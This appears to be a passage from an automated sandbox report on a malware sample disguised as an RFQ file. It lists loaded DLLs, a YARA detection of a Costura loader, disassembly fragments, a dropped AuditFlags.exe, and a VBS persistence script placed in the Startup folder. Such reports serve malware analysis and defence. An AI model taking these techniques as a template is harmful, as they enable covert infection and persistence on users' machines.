              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: RFQ-12202430_ACD_Group.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: RFQ-12202430_ACD_Group.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1480750438.0000000006660000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1480750438.0000000006660000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: RFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected Costura Assembly Loader
              Source: Yara matchFile source: 0.2.RFQ-12202430_ACD_Group.pif.exe.64c0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1479490419.00000000064C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1622157833.0000000002967000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1465657155.0000000003057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RFQ-12202430_ACD_Group.pif.exe PID: 7544, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: AuditFlags.exe PID: 7992, type: MEMORYSTR
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_063D4F68 pushad ; ret 0_2_063D5199
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_063D4F6A pushad ; ret 0_2_063D5199
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_064B4A49 push es; ret 0_2_064B4A5C
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_064B2BA9 push es; ret 0_2_064B2BD0
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_064B0006 push es; retf 0_2_064B001C
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_064B0526 push ss; ret 0_2_064B0527
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065C3DD0 push es; ret 0_2_065C3E80
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065DC45D push es; iretd 0_2_065DC480
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065D1442 pushfd ; retf 0_2_065D1449
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065DD4EE push ecx; iretd 0_2_065DD4F5
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065DD4E6 push edi; iretd 0_2_065DD4ED
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065D8541 push ds; ret 0_2_065D8542
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065DC535 push es; retf 0_2_065DC550
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065DD535 push es; iretd 0_2_065DD539
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065D5D00 push es; retf 0_2_065D5D1C
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065FC259 push ds; ret 0_2_065FC260
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065FC35A push es; retf 0_2_065FC380
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_065F1BB0 push es; ret 0_2_065F1BC0
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_066D3420 push esp; retf 0_2_066D3421
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeCode function: 0_2_066D21E3 push esp; ret 0_2_066D21E9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_05136C30 push eax; ret 2_2_05136C31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0520EF00 pushad ; ret 2_2_0520EF09
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05E70526 push ss; ret 5_2_05E70527
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05F91442 pushfd ; retf 5_2_05F91449
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05F967C9 push ds; ret 5_2_05F967CA
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeCode function: 5_2_05FBC259 push ds; ret 5_2_05FBC260
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02933A6F push ebp; iretd 6_2_02933A72
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_05296C30 push eax; ret 6_2_05296C31
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\AuditFlags.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior

              Boot Survival

              barindex
              Drops VBS files to the startup folder
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbsJump to dropped file
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbsJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbsJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\AuditFlags.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
